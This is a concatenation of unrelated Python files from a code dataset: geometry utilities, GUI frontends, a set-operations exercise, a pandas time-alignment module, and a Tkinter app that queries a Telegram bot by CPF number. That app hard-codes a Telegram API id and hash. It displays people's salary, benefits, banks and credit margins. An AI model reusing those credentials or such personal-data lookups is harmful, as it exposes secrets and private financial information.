            depth = depth[:,:,0]
        h, w = depth.shape[0:2]
        u = np.arange(w)[None,:,None].repeat(h,axis=0)
        v = np.arange(h)[:,None,None].repeat(w,axis=1)
        uvd = np.concatenate([u, v, depth[:,:,None]],axis=-1)
        # construct validity mask
        if filter_edge:
            mask = np.zeros_like(depth)
            for i in range(window_s, h):
                for j in range(window_s, w):
                    check = depth[(i-window_s):(i+window_s), (j-window_s):(j+window_s)] / depth_unit
                    check = np.max(check) - np.min(check)
                    if check < max_range:
                        mask[i,j] = 1
            uvd = uvd[mask>0.5]
        uvd = uvd.reshape(-1,3)
        if filter_far:
            uvd = uvd[uvd[:,-1]<far_thres*depth_unit]
        if filter_near:
            uvd = uvd[uvd[:,-1]>near_thres*depth_unit]
        pc = self.proj_2to3(uvd[:,0:2], uvd[:,-1], intrinsic, extrinsic, depth_unit)
        if return_uv:
            return uvd[:,0:2], uvd[:,-1], pc
        else:
            return pc
    def proj_pc2dpt(self, ply, extrinsic, intrinsic, h, w):
        """Render a point cloud to an (h, w) depth image with a simple
        z-buffer (keep the nearest depth per pixel; empty pixels end up
        as 0.0 via the 10000 sentinel)."""
        if type(ply) is not np.ndarray:
            ply = np.array(ply.points)
        uv, dpt = self.proj_3to2(ply, intrinsic, extrinsic)
        mask_w = (uv[:,0]<w) & (uv[:,0]>=0)
        mask_h = (uv[:,1]<h) & (uv[:,1]>=0)
        # drop points behind (or too close to) the camera
        mask_d = dpt>0.05
        mask = mask_h & mask_w & mask_d
        uv = uv[mask].astype(np.int32)
        dpt = dpt[mask]
        result = np.ones([h,w])*10000
        for i in range(uv.shape[0]):
            u,v = uv[i]
            d = dpt[i]
            result[v,u] = min(result[v,u],d)
        result[result>9999] = 0.0
        return result
class suppress_stdout_stderr(object):
    '''
    Context manager that silences stdout and stderr at the file
    descriptor level (fd 1 and fd 2), so even output from compiled
    C/Fortran extensions is suppressed -- plain sys.stdout redirection
    cannot reach those.  Raised exceptions still propagate; their
    traceback is printed after the manager has exited.

    Fixes a descriptor leak in the original: the duplicated
    save_fds were never closed, leaking two fds per instance.
    '''
    def __init__(self):
        # Two handles on /dev/null to splice over stdout/stderr.
        self.null_fds = [os.open(os.devnull, os.O_RDWR) for x in range(2)]
        # Duplicates of the real stdout (1) and stderr (2) for restore.
        self.save_fds = (os.dup(1), os.dup(2))
    def __enter__(self):
        # Point fd 1 and fd 2 at /dev/null.
        os.dup2(self.null_fds[0], 1)
        os.dup2(self.null_fds[1], 2)
    def __exit__(self, *_):
        # Restore the original descriptors...
        os.dup2(self.save_fds[0], 1)
        os.dup2(self.save_fds[1], 2)
        # ...then release every fd we created (null handles AND the
        # saved duplicates, which the original leaked).
        for fd in self.null_fds + list(self.save_fds):
            os.close(fd)
def points_to_hpoints(points):
    """Append a homogeneous 1-coordinate column: (n, k) -> (n, k+1)."""
    n, _ = points.shape
    ones_col = np.ones([n, 1])
    return np.concatenate([points, ones_col], 1)
def hpoints_to_points(hpoints):
    """Dehomogenise: divide each row by its last coordinate, drop it."""
    scale = hpoints[:, -1:]
    return hpoints[:, :-1] / scale
def transform_points(pts, transform):
    """Apply a 3x3 rotation, 3x4 rigid, or 4x4 homogeneous transform to
    an (n, 3) point array; other shapes raise NotImplementedError."""
    rows, cols = transform.shape
    if (rows, cols) == (3, 3):
        return pts @ transform.T
    if (rows, cols) == (3, 4):
        # Rotation part plus broadcast translation column.
        return pts @ transform[:, :3].T + transform[:, 3:].T
    if (rows, cols) == (4, 4):
        return hpoints_to_points(points_to_hpoints(pts) @ transform.T)
    raise NotImplementedError
def random_rotation_matrix():
    """Return a random 3x3 rotation matrix.

    A random axis and angle are drawn (fresh OS-seeded RandomState),
    then the axis-angle vector's components are used as Z-Y-Z Euler
    angles to build the matrix.
    """
    rng = np.random.RandomState()
    axis = rng.rand(3) - 0.5
    axis /= np.linalg.norm(axis) + 1E-8
    theta = np.pi * rng.uniform(0.0, 1.0)
    alpha, beta, gama = axis * theta
    def _rot_z(angle):
        # Rotation about the Z axis (same sign convention as original).
        c, s = np.cos(angle), np.sin(angle)
        return np.array([[c, s, 0.0],
                         [-s, c, 0.0],
                         [0.0, 0.0, 1.0]])
    cb, sb = np.cos(beta), np.sin(beta)
    rot_y = np.array([[cb, 0.0, -sb],
                      [0.0, 1.0, 0.0],
                      [sb, 0.0, cb]])
    return _rot_z(gama) @ (rot_y @ _rot_z(alpha))
def random_se3():
    """Return a random 4x4 rigid transform: random rotation plus a
    translation drawn uniformly from [-500, 500)^3."""
    transform = np.eye(4)
    transform[0:3, 0:3] = random_rotation_matrix()
    offset = np.random.rand(3) - 0.5
    transform[0:3, -1] = offset * 1000
    return transform
def make_open3d_point_cloud(xyz, color=None):
    """Wrap an (n, 3) array as an open3d PointCloud; objects without an
    ``ndim`` attribute (i.e. already point clouds) are passed through.

    Fixes the original, which assigned ``pcd.color`` -- the Open3D
    PointCloud attribute is ``colors``, so colour data was lost.
    """
    if not hasattr(xyz, 'ndim'):
        return xyz
    pcd = o3d.geometry.PointCloud()
    pcd.points = o3d.utility.Vector3dVector(xyz)
    if color is not None:
        pcd.colors = o3d.utility.Vector3dVector(color)
    return pcd
def trans_gt_for_kitti(gt):
    """Re-axis a 4x4 ground-truth pose for the KITTI convention,
    mutating *gt* in place and returning it.

    The rotation block has rows and columns 1/2 swapped; the
    translation has Y negated and is then reversed to (z, -y, x) order.
    """
    perm = [0, 2, 1]
    rot = gt[0:3, 0:3]
    gt[0:3, 0:3] = rot[perm][:, perm]
    trans = gt[0:3, -1].copy()
    trans[1] *= -1
    gt[0:3, -1] = trans[[2, 1, 0]]
    return gt
def save_depth(dpt_fn, dpt, scale=1):
    """Scale a depth map, truncate it to uint16, and write it to
    *dpt_fn* via PIL (the caller's array is left unmodified)."""
    scaled = (dpt * scale).astype(np.uint16)
    Image.fromarray(scaled).save(dpt_fn)
17984731889 | s = input()
# Distinct characters of the input string s (read on the line above).
se = set(list(s))
# print('se', se)
if len(se) == 1:
    # Only one distinct character: print 0 and stop early.
    print(0)
    exit()
def f(v):
    """Split the global string ``s`` on character *v* and return the
    length of the longest surviving segment."""
    segment_lengths = [len(part) for part in s.split(v) if part]
    return max(segment_lengths)
# For every candidate character, f(i) is the longest run of text left
# after splitting on i; the answer is the smallest such maximum.
ans = 1000
for i in se:
    v = f(i)
    ans = min(ans, v)
print(ans)
# serval 6,1
# srvvl 5,2
# 4,3
# → svvv → vvv
# jackal
# aacaa
# jaajjj
# aaajj
# aaaj
# aaa
# jajjjjjjjajjjjjjjjjj
# aajjjjjjaajjjjjjjjj
# aajjjjjaaajjjjjjjj
# aajjjjaaaajjjjjjj
# ...
| Aasthaengg/IBMdataset | Python_codes/p03687/s684323459.py | s684323459.py | py | 466 | python | en | code | 0 | github-code | 90 |
43855201560 | import PySimpleGUI as sg
class Widget:
    """Factory helpers for the PySimpleGUI widgets used by the app."""
    @staticmethod
    def relief():
        """Title banner text rendered with a ridged relief."""
        return sg.T(text='Trello GUI',
                    size=(30, 1),
                    justification='center',
                    font=("Helvetica", 20),
                    relief=sg.RELIEF_RIDGE)
    @staticmethod
    def label(text: str, width: int = None):
        """Single-line text acting as a label; width defaults to the
        text length plus one."""
        return sg.T(text, ((width if width else len(text) + 1), 1))
    @staticmethod
    def combo(key, values=None, enable_events=True):
        """Combo box; starts with no choices unless *values* is given."""
        return sg.Combo(values=values if values else [],
                        size=(25, 1),
                        key=key,
                        enable_events=enable_events)
    @staticmethod
    def input(key: str, width: int, height: int = 1):
        """Empty single-line input field of the given size."""
        return sg.InputText('', size=(width, height), key=key)
    @staticmethod
    def textarea(key: str, height: int, width: int = 35):
        """Empty multi-line text area."""
        return sg.MLine('', size=(width, height), key=key)
    @staticmethod
    def button(text: str, key: str):
        """Plain push button."""
        return sg.Button(text, key=key)
class Frontend(Widget):
    """Defines the GUI layout (original docstring: GUIの見た目を定義)."""
    def column_choice(self):
        """Board and list selection area."""
        left = sg.Column(layout=[[self.label('Board')],
                                 [self.label('List')]])
        right = sg.Column(layout=[[self.combo(key='BOARD_NAME')],
                                  [self.combo(key='LIST_NAME')]])
        return sg.Column([
            [left, right]
        ], size=(280, 70))
    def frame_import(self):
        """Import-button frame."""
        return sg.Frame('Import', layout=[[self.button(text='Excel', key='IMPORT_EXCEL')]])
    def frame_export(self):
        """Export-button frame."""
        return sg.Frame('Export', layout=[[self.button('Excel', key='EXPORT_EXCEL')]])
    def frame_add_card(self):
        """Card-creation frame: name, description, due date/time, ADD."""
        col1 = [[self.label(text='due date', width=10)],
                [self.input(width=10, key="DUE_DATE")]]
        col2 = [[self.label(text='time', width=10)],
                [self.input(width=10, key="DUE_TIME")]]
        return sg.Frame('Add Card', [
            [self.label('Card Name')],
            [self.textarea(key="CARD_NAME", height=2)],
            [self.label('Description')],
            [self.textarea(key="DESC", height=2)],
            [sg.Column(col1), sg.Column(col2)],
            [self.button(text='ADD', key="ADD_CARD")]
        ], vertical_alignment='top', size=(300, 280))
    def frame_debug_print(self):
        """Debug-output frame with a clear button."""
        return sg.Frame('Debug', [
            [self.button(text='Clear', key='CLEAR_DEBUG')],
            [self.textarea(height=4, key='DEBUG_PRINT')]
        ], size=(300, 120))
    def frame_card_print(self):
        """Card-preview frame (whole board or selected list)."""
        return sg.Frame('Print Card', [
            [self.button(text='All Card in Board', key='ALL_LIST_PRINT'),
             self.button(text='Just Selected List', key='SELECTED_LIST_PRINT')],
            [self.textarea(key='PREVIEW', width=30, height=20)]
        ])
    def layout(self):
        # Two-column layout: inputs/debug on the left, export/preview
        # on the right, under the title banner.
        left = sg.Column(layout=[
            [self.column_choice()],
            [self.frame_add_card()],
            [self.frame_debug_print()]
        ])
        right = sg.Column(layout=[
            [self.frame_export(), self.frame_import()],
            [self.frame_card_print()]], vertical_alignment='t')
        layout = [[self.relief()],
                  [left, right]]
        return layout
    def window(self):
        # finalize=True so widgets can be updated before the event loop.
        return sg.Window(title='for Trello...',
                         size=(600, 600),
                         finalize=True,
                         layout=self.layout())
| qlitre/pysimplegui-trello | frontend.py | frontend.py | py | 4,066 | python | en | code | 3 | github-code | 90 |
23561187884 | """
- Author: Sharif Ehsani
- Date: December 2020
- https://github.com/sharifehsani
In the Spotlight:
Set Operations
In this section you will look at Program 10-3, which demonstrates various set operations.
The program creates two sets: one that holds the names of students on the baseball team
and another that holds the names of students on the basketball team. The program then
performs the following operations:
• It finds the intersection of the sets to display the names of students who play both
sports.
• It finds the union of the sets to display the names of students who play either sport.
• It finds the difference of the baseball and basketball sets to display the names of students
who play baseball but not basketball.
• It finds the difference of the basketball and baseball (basketball – baseball) sets to display
the names of students who play basketball but not baseball. It also finds the difference
of the baseball and basketball (baseball – basketball) sets to display the names
of students who play baseball but not basketball.
• It finds the symmetric difference of the basketball and baseball sets to display the
names of students who play one sport but not both.
"""
# Prompt for baseball-team members and collect them into the given set.
def baseball_team_method(baseball_team):
    """Interactively fill *baseball_team* with student names and return it.

    A name already present triggers one re-prompt (matching the original
    single-retry behaviour); entering anything other than 'y' at the
    continue prompt ends the loop.
    """
    print()
    print("First enter the names of students for baseball team.")
    more = 'y'
    while more == 'y':
        name = input("Enter the name of student in the baseball team: ")
        if name in baseball_team:
            # Sets silently drop duplicates, so ask once for another name.
            print(name, "already exist in the set and sets can't have duplicate elements.")
            name = input("Enter a different name: ")
        baseball_team.add(name)
        more = input("Do you want to add more? 'y' = yes, 'n' = no: ")
    return baseball_team
# Prompt for basketball-team members and collect them into the given set.
def basketball_team_method(basketball_team):
    """Interactively fill *basketball_team* with student names and
    return it (same single-retry duplicate handling as the baseball
    collector)."""
    print()
    print("Now enter the names of students for basketbal team.")
    add_more = 'y'
    while add_more == 'y':
        name = input("Enter the name of student in the baseball_team team: ")
        if name in basketball_team:
            # Sets silently drop duplicates, so ask once for another name.
            print(name, "already exist in the set and sets can't have duplicate elements.")
            name = input("Enter a different name: ")
        basketball_team.add(name)
        add_more = input("Do you want to add more? 'y' = yes, 'n' = no: ")
    return basketball_team
# Print the students who appear on both team rosters.
def intersection_method(baseball, basketball):
    """Print the intersection of the two rosters (returns None)."""
    both = baseball.intersection(basketball)
    print()
    print("The follwoing students play in both teams:")
    for name in both:
        print(name, end=', ')
# Print the students who appear on either roster.
def union_method(baseball, basketball):
    """Print the union of the two rosters (returns None)."""
    combined = baseball.union(basketball)
    print()
    print("The follwoing students play in either baseball or basketball teams:")
    for name in combined:
        print(name, end=', ')
# Print the players unique to each team: first baseball-only,
# then basketball-only.
def difference_method(baseball, basketball):
    """Print both one-sided set differences of the rosters (returns None)."""
    only_baseball = baseball.difference(basketball)
    print()
    print("The follwoing students play in baseball team but not in basketball team:")
    for name in only_baseball:
        print(name, end=', ')
    only_basketball = basketball.difference(baseball)
    print()
    print("The follwoing students play in basketball team but not in baseball team:")
    for name in only_basketball:
        print(name, end=', ')
# Print the students who play exactly one of the two sports.
def sym_dif(baseball, basketball):
    """Print the symmetric difference of the rosters (returns None)."""
    exclusive = baseball.symmetric_difference(basketball)
    print()
    print("The follwoing students play only in one team:")
    for name in exclusive:
        print(name, end=', ')
# Drive the demo: collect both rosters, then report every comparison.
def main():
    """Collect the two rosters interactively, then print their
    intersection, union, differences, and symmetric difference."""
    baseball = baseball_team_method(set())
    basketball = basketball_team_method(set())
    intersection_method(baseball, basketball)
    union_method(baseball, basketball)
    difference_method(baseball, basketball)
    sym_dif(baseball, basketball)
# Entry point: run the interactive set-operations demo.
main()
| sharifehsani/starting-out-with-python | chapter10/set_operation.py | set_operation.py | py | 5,617 | python | en | code | 0 | github-code | 90 |
34887661468 | from telethon import TelegramClient, events, sync
from tkinter import *
import tkinter
import time
import asyncio
import wckToolTips
from PIL import ImageTk, Image
# DEFINITIONS
HEIGHT = 300
WIDTH = 750
root = Tk()
root.title("M.E. Consultas")
# root.iconbitmap('ME.png')
canvas = Canvas(root, height=HEIGHT, width=WIDTH)
canvas.pack()
# MAIN FRAMES
logo_img = ImageTk.PhotoImage(Image.open("ME.png"))
frame_logo = Label(root, image=logo_img)
frame_logo.place(relx=0.5, rely=0.02, height=80, width=350, anchor='n')
# frame_user = Frame(root, borderwidth=2, relief="groove")
# frame_user.place(x=72, rely=0.02, height=135, width=130, anchor='n')
frame_cpf = Frame(root, borderwidth=2, relief="groove")
frame_cpf.place(relx=0.5, rely=0.3, height=35, width=250, anchor='n')
frame_nome = Frame(root, borderwidth=2, relief="groove")
frame_nome.place(relx=0.5, rely=0.425, height=25, width=300, anchor='n')
frame_semafaro = Frame(root)
frame_semafaro.place(relx=0.715, rely=0.425, height=25, width=25, anchor='n')
frame_top_infos = Frame(root)
frame_top_infos.place(relx=0.5, rely=0.52, height=20, relwidth=1, anchor='n')
frame_infos = Frame(root)
frame_infos.place(relx=0.5, rely=0.60, height=115, relwidth=0.99, anchor='n')
# INFOS COLUMNS
frame_idade = Frame(frame_infos)
frame_idade.columnconfigure(0, weight=1)
frame_idade.place(relx=0.024, height=120, relwidth=0.05, anchor='n')
frame_nbenef = Frame(frame_infos)
frame_nbenef.columnconfigure(0, weight=1)
frame_nbenef.place(relx=0.0784, height=120, relwidth=0.0585, anchor='n')
frame_salario = Frame(frame_infos)
frame_salario.columnconfigure(0, weight=1)
frame_salario.place(relx=0.1508, height=120, relwidth=0.085, anchor='n')
# frame_data = Frame(frame_infos, bg='blue')
# frame_data.columnconfigure(0, weight=1)
# frame_data.place(relx=0.213, height=120, relwidth=0.068, anchor='n')
frame_cidade = Frame(frame_infos)
frame_cidade.columnconfigure(0, weight=1)
frame_cidade.place(relx=0.26, height=120, relwidth=0.13, anchor='n')
frame_bancos = Frame(frame_infos)
frame_bancos.columnconfigure(0, weight=1)
frame_bancos.place(relx=0.4926, height=120, relwidth=0.332, anchor='n')
frame_qnt = Frame(frame_infos)
frame_qnt.columnconfigure(0, weight=1)
frame_qnt.place(relx=0.682, height=120, relwidth=0.0475, anchor='n')
frame_card = Frame(frame_infos)
frame_card.columnconfigure(0, weight=1)
frame_card.place(relx=0.755, height=120, relwidth=0.096, anchor='n')
frame_mgconsig = Frame(frame_infos)
frame_mgconsig.columnconfigure(0, weight=1)
frame_mgconsig.place(relx=0.8515, height=120, relwidth=0.097, anchor='n')
frame_mgcard = Frame(frame_infos)
frame_mgcard.columnconfigure(0, weight=1)
frame_mgcard.place(relx=0.949, height=120, relwidth=0.0975, anchor='n')
# MAIN CELLS
nome_cell = Label(frame_nome, text='NOME:')
nome_cell.grid(row=0, column=0)
idade_cell = Label(frame_top_infos, text='IDADE', borderwidth=2, relief="groove")
idade_cell.place(relx=0.056, y=10, relwidth=0.05, anchor='e')
nbenef_cell = Label(frame_top_infos, text='BENEF.', borderwidth=2, relief="groove")
nbenef_cell.place(relx=0.114, y=10, relwidth=0.06, anchor='e')
salario_cell = Label(frame_top_infos, text='SALÁRIO', borderwidth=2, relief="groove")
salario_cell.place(relx=0.198, y=10, relwidth=0.085, anchor='e')
# data_cell = Label(frame_top_infos, text='DATA', borderwidth=2, relief="groove")
# data_cell.place(relx=0.255, y=10, relwidth=0.0725, anchor='e')
cidade_cell = Label(frame_top_infos, text='AGENCIA', borderwidth=2, relief="groove")
cidade_cell.place(relx=0.329, y=10, relwidth=0.131, anchor='e')
bancos_cell = Label(frame_top_infos, text='BANCOS', borderwidth=2, relief="groove")
bancos_cell.place(relx=0.659, y=10, relwidth=0.331, anchor='e')
qnt_cell = Label(frame_top_infos, text='QNT.', borderwidth=2, relief="groove")
qnt_cell.place(relx=0.708, y=10, relwidth=0.05, anchor='e')
bcard_cell = Label(frame_top_infos, text='CARD', borderwidth=2, relief="groove")
bcard_cell.place(relx=0.805, y=10, relwidth=0.1, anchor='e')
mgconsig_cell = Label(frame_top_infos, text='MG. CONSIG', borderwidth=2, relief="groove")
mgconsig_cell.place(relx=0.9, y=10, relwidth=0.1, anchor='e')
mgcard_cell = Label(frame_top_infos, text='MG. CARD', borderwidth=2, relief="groove")
mgcard_cell.place(relx=0.996, y=10, relwidth=0.1, anchor='e')
# # USER ENTRY
# user = Label(frame_user, text='Usuário:')
# user.place(relx=0.2, rely=0.02, anchor='n', height=20, width=45)
#
# user_entry = Entry(frame_user)
# user_entry.place(relx=0.68, rely=0.02, anchor='n', height=18, width=75)
#
# passw = Label(frame_user, text='Senha:')
# passw.place(relx=0.180, rely=0.17, anchor='n', height=20, width=40)
#
# passw_entry = Entry(frame_user, show="*")
# passw_entry.place(relx=0.68, rely=0.18, anchor='n', height=18, width=75)
# CLIENTE CODE ENTRY
cpf_entry = Entry(frame_cpf)
cpf_entry.place(relx=0.01, rely=0.03, height=26, width=170)
# TELEGRAM SETUP
# SECURITY(review): the Telegram API id/hash are hard-coded in source
# control; they should be moved to environment variables or an ignored
# config file, and the exposed hash revoked/regenerated.
api_id = 1311637
api_hash = '149718fbbd581b34c98c8a214b997222'
client = TelegramClient('session_name', api_id, api_hash)
# start() performs the login (presumably interactive on first run,
# reusing the 'session_name' session file afterwards -- per Telethon).
client.start()
def send_telegram():
    """Query the 'ConsignadoBot' Telegram bot with the CPF typed in `cpf_entry`
    and render the parsed reply into the result frames.

    The bot's reply is read from ``respostas.txt`` (written elsewhere by the
    Telethon message handler). One row of labels is built per parsed record,
    and the file is truncated afterwards so the next query starts clean.
    """
    # CLEAN PREVIOUS SEARCHES: drop every widget from the result columns.
    for widget in frame_idade.winfo_children():
        widget.destroy()
    for widget in frame_nbenef.winfo_children():
        widget.destroy()
    for widget in frame_salario.winfo_children():
        widget.destroy()
    # for widget in frame_data.winfo_children():
    #     widget.destroy()
    for widget in frame_cidade.winfo_children():
        widget.destroy()
    for widget in frame_bancos.winfo_children():
        widget.destroy()
    for widget in frame_qnt.winfo_children():
        widget.destroy()
    for widget in frame_card.winfo_children():
        widget.destroy()
    for widget in frame_mgconsig.winfo_children():
        widget.destroy()
    for widget in frame_mgcard.winfo_children():
        widget.destroy()
    cpf = cpf_entry.get()
    consulta = client.send_message('ConsignadoBot', cpf)
    # Block until Telethon confirms the message actually left this account.
    while consulta.out is not True:
        time.sleep(1)
    file = open("respostas.txt", "r")
    resposta_file = file.readlines()
    file.close()
    print(resposta_file)
    i = 0
    for l in resposta_file:
        # Traffic-light status lines from the bot (the unused `update`
        # locals from the original were removed).
        if 'VERMELHO' in l:
            vermelho = Label(frame_semafaro, bg="red")
            vermelho.place(height=25, width=25)
        if 'AMARELO' in l:
            amarelo = Label(frame_semafaro, bg="yellow")
            # BUG FIX: the original placed `vermelho` here, which is the wrong
            # widget and a NameError when no VERMELHO line came first.
            amarelo.place(height=25, width=25)
        if 'VERDE' in l:
            verde = Label(frame_semafaro, bg="green")
            verde.place(height=25, width=25)
        if 'NOME:' in l:
            nome = re.search(r'NOME:(.*)', l).group(1)
            nome_plc = Label(frame_nome, text=nome)
            nome_plc.grid(row=0, column=1, sticky=EW)
        elif 'IDADE:' in l:
            # Record lines are ' // '-separated fields in a fixed order.
            split = l.split(' // ')
            age = re.search('IDADE:(.*)', split[0]).group(1)
            idade = int(age)
            cidade = re.search('CIDADE:(.*)', split[1]).group(1)
            beneficio = re.search('BENEFÍCIO:(.*)', split[2]).group(1)
            salario = re.search('SALÁRIO:(.*)', split[3]).group(1)
            bancos = re.search('BANCOS:(.*)', split[4]).group(1)
            quantidade = re.search('QNT:(.*)', split[5]).group(1)
            qnt = int(quantidade)
            card = re.search('CARTÃO:(.*)', split[6]).group(1)
            mg_consig = re.search('MG. CONSIG:(.*)', split[7]).group(1)
            mg_card = re.search('MG. CARD:(.*)', split[8]).group(1)
            # Highlight clients over 75 in red.
            # BUG FIX: the original used `elif idade > 75`, so a client aged
            # exactly 75 produced no label at all.
            if idade < 75:
                idade_plc = Label(frame_idade, text=idade, borderwidth=1, relief="groove")
                idade_plc.grid(row=i + 1, column=0, sticky=EW)
            else:
                idade_plc = Label(frame_idade, text=idade, borderwidth=1, relief="groove", bg='red')
                idade_plc.grid(row=i + 1, column=0, sticky=EW)
            benef_plc = Label(frame_nbenef, text=beneficio, borderwidth=1, relief="groove")
            benef_plc.grid(row=i + 1, column=0, sticky=EW)
            agencia_plc = Label(frame_cidade, text=cidade, borderwidth=1, relief="groove")
            agencia_plc.grid(row=i + 1, column=0, sticky=EW)
            wckToolTips.register(agencia_plc, cidade)
            salario_plc = Label(frame_salario, text=salario, borderwidth=1, relief="groove")
            salario_plc.grid(row=i + 1, column=0, sticky=EW)
            wckToolTips.register(salario_plc, salario)
            bancos_plc = Label(frame_bancos, text=bancos, borderwidth=1, relief="groove")
            bancos_plc.grid(row=i + 1, column=0, sticky=EW)
            wckToolTips.register(bancos_plc, bancos)
            # Highlight clients with 9+ active contracts in red.
            if qnt >= 9:
                qnt_plc = Label(frame_qnt, text=qnt, borderwidth=1, relief="groove", bg='red')
                qnt_plc.grid(row=i + 1, column=0, sticky=EW)
            else:
                qnt_plc = Label(frame_qnt, text=qnt, borderwidth=1, relief="groove")
                qnt_plc.grid(row=i + 1, column=0, sticky=EW)
            card_plc = Label(frame_card, text=card, borderwidth=1, relief="groove")
            card_plc.grid(row=i + 1, column=0, sticky=EW)
            wckToolTips.register(card_plc, card)
            mgconsig_plc = Label(frame_mgconsig, text=mg_consig, borderwidth=1, relief="groove")
            mgconsig_plc.grid(row=i + 1, column=0, sticky=EW)
            mgcard_plc = Label(frame_mgcard, text=mg_card, borderwidth=1, relief="groove")
            mgcard_plc.grid(row=i + 1, column=0, sticky=EW)
            i += 1
    # Truncate the reply file so the next query does not re-render old rows.
    file = open("respostas.txt", 'w')
    file.write('')
    file.close()
# Button that triggers the Telegram query for the typed CPF.
cpf_btn = Button(frame_cpf, text='Consultar', command=send_telegram)
cpf_btn.place(relx=0.72, rely=0.055)
def main():
    """Drive the Tk event loop manually so it can run alongside Telethon.

    Runs until the window is closed (TclError) or the user hits Ctrl-C, and
    always disconnects the Telegram client on the way out.
    """
    # The size limits are constant — set them once instead of on every tick.
    root.minsize(750, 300)
    root.maxsize(1920, 300)
    try:
        while True:
            root.update()
            # Yield the CPU briefly: a bare update() busy-loop pegs a core.
            time.sleep(0.01)
    except KeyboardInterrupt:
        pass
    except tkinter.TclError as e:
        # Raised when the window is destroyed; re-raise anything unexpected.
        if 'application has been destroyed' not in e.args[0]:
            raise
    finally:
        client.disconnect()
client.loop.run_until_complete(main())
| moisesfelipee/Telegram | Local.py | Local.py | py | 10,113 | python | en | code | 1 | github-code | 90 |
18331491719 | import bisect
# Count index triples (i, j, m) with i < j < m and sides[m] < sides[i] + sides[j]
# using binary search on the sorted side lengths.
n = int(input())
sides = sorted(map(int, input().split()))
total = 0
for i in range(n - 1):
    for j in range(i + 1, n - 1):
        limit = sides[i] + sides[j]
        # All candidates strictly below `limit` end before this position.
        pos = bisect.bisect_left(sides, limit)
        total += pos - j - 1
print(total)
28398838159 | """
This module contains methods to make it easy to align pandas objects that have time series indexes.
"""
from typing import Callable, Optional, Union
import numpy as np
import pandas as pd
from aika.time.utilities import _get_index, _get_index_level
from aika.utilities.pandas_utils import IndexTensor, Level, Tensor
def _reindex_by_level(tensor: Tensor, level: Optional[Level]) -> Tensor:
    """
    Return a copy of ``tensor`` whose index has been reduced to the single
    level given by ``level``. Raises if that level contains duplicates.
    """
    new_index = _get_index_level(tensor, level)
    if new_index.duplicated().any():
        raise ValueError(
            "data must not contain any duplicated index values on the relevant level"
        )
    result = tensor.copy()
    result.index = new_index
    return result
def _shorten_data(tensor: Tensor, contemp: bool, last_ts: pd.Timestamp):
"""
Removes any data from tensor that is after the last time stamp.
"""
try:
return tensor.loc[
tensor.index <= last_ts if contemp else tensor.index < last_ts
]
except TypeError as e:
raise ValueError(
"This error almost always results from mixing timezone naive and timezone aware datetimes."
) from e
def causal_match(
    data: Tensor,
    index: IndexTensor,
    contemp: bool = False,
    data_level: Optional[Level] = None,
    index_level: Optional[Level] = None,
    fill_limit: Optional[int] = None,
) -> Tensor:
    """
    This will align data onto an index. The index can be a dataframe or series but only the index is used. This will
    return the data aligned onto the index.

    Parameters
    ----------
    data: IndexTensor
        This is a pandas object that we want to align onto the index. The data must not contain any duplicated
        index values on the relevant level, i.e. must be unstacked.
    index: IndexTensor
        This is pandas object that represents the target index.
    contemp: bool
        This variable says whether an index value in the data index that is an exact match is "causally available"
        in the alignment. Roughly equivalent to the semantics of np.searchsorted "side" semantics with True == "left".
    data_level :
        If data is multi-Indexed, the level on which to align.
    index_level :
        If index is multi-Indexed, the level on which to align.
    fill_limit :
        The number of times a single row of data in "data" can be re-used as the value for "index". E.g., if the
        index is daily and the data is weekly on monday, a value of 0 means only monday will have data.

    Returns
    -------
    IndexTensor : The data object reindexed to have the same index as `index`
    """
    target_index = _get_index_level(index, index_level)
    if target_index.empty:
        # result will be empty but this will preserve level names.
        return data.reindex(_get_index(index))
    unique_target_index = target_index.drop_duplicates()
    data = _reindex_by_level(data, data_level)
    # because of the semantics of search sorted we must remove any rows in the data that come after
    # the final entry in the target index.
    data = _shorten_data(data, contemp, unique_target_index[-1])
    # Map each data timestamp to the first target timestamp at which it is
    # causally available ("left" makes an exact match available immediately).
    data.index = unique_target_index[
        np.searchsorted(
            unique_target_index, data.index, side="left" if contemp else "right"
        ).astype(int)
    ]
    # if there were multiple rows of data that align onto the same target index value, we want to keep only
    # the final row ....
    data = data[~data.index.duplicated(keep="last")]
    # .... and reindex to put any duplication back so that the final index is identical to the target.
    # fill_limit == 0 disables forward-filling entirely; otherwise stale rows
    # are carried forward at most `fill_limit` steps (None = unlimited).
    data = data.reindex(
        target_index,
        copy=False,
        **(
            {
                "method": None,
            }
            if fill_limit == 0
            else {"method": "ffill", "limit": fill_limit}
        )
    )
    data.index = _get_index(index)
    return data
def causal_resample(
    data: Tensor,
    index: IndexTensor,
    agg_method: Union[str, Callable],
    contemp: bool = False,
    data_level: Optional[Level] = None,
    index_level: Optional[Level] = None,
) -> Tensor:
    """
    This will resample data onto an index. The index can be a dataframe or series but only the index is used.
    This will return the data aligned onto the index.

    Parameters
    ----------
    data: IndexTensor
        This is a pandas object that we want to align onto the index. The data must not contain any duplicated
        index values on the relevant level, i.e. must be unstacked.
    index: IndexTensor
        This is pandas object that represents the target index.
    agg_method:
        The aggregation method used in the resampling. This is most commonly "last", note that in pandas
        the semantics of "last" are the last non-nan value in the resampling window, which is different from
        getting the last row.
    contemp: bool
        This variable says whether an index value in the data index that is an exact match is "causally available"
        in the alignment. Roughly equivalent to the semantics of np.searchsorted "side" semantics with True == "left".
    data_level :
        If data is multi-Indexed, the level on which to align.
    index_level :
        If index is multi-Indexed, the level on which to align.

    Returns
    -------
    IndexTensor : The data object reindexed to have the same index as `index`
    """
    target_index = _get_index_level(index, index_level)
    if target_index.empty:
        # returns an empty version of the tensor with indexes preserved.
        result = data.iloc[:0]
        result.index = target_index
        return result
    data = _reindex_by_level(data, data_level)
    unique_target_index = target_index.drop_duplicates()
    data = _shorten_data(data, contemp, unique_target_index[-1])
    # Each data row is assigned to the target timestamp at which it first
    # becomes causally available, then aggregated within that bucket.
    grouper = np.searchsorted(
        unique_target_index, data.index, side="left" if contemp else "right"
    )
    result = data.groupby(grouper).aggregate(agg_method)
    result.index = unique_target_index[grouper].drop_duplicates()
    # Reindex back to the full target so buckets with no data become NaN.
    result = result.reindex(target_index)
    result.index = _get_index(index)
    return result
| phil20686/aika | libs/time/src/aika/time/alignment.py | alignment.py | py | 6,247 | python | en | code | 2 | github-code | 90 |
70491599337 | import numpy as np
from matplotlib import pyplot as plt
# %matplotlib inline
from dle.inference import load_image, rescale, crop_center, normalize
import matplotlib.patches as patches
import json
# img = load_image('http://images.cocodataset.org/val2017/000000397133.jpg')
# plt.imshow(img)
# Pre-computed SSD detections, keyed by image path.
all_box = np.load('SSD_Lap_0.5_box.npy').item()
